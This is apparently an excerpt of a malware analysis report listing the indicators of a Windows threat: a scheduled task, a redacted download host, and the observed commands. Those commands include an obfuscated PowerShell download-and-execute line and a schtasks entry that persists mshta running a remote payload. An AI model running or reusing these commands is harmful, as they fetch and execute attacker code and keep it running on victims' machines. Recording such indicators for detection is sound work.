Technical Information
- <SYSTEM32>\tasks\klremora
- http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/kl.crt
- 'dr########3.hospedagemdesites.ws':80
- DNS ASK dr########3.hospedagemdesites.ws
- '<SYSTEM32>\cmd.exe' /c start /min powershell.exe -nologo -ExecutionPolicy Unrestricted i'e'x ((New-Object System.Net.WebClient).DownloadString('http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certifi...
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 120 /tn "KLremora" /tr "\"<SYSTEM32>\mshta.exe\"http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/remota.mp3" /F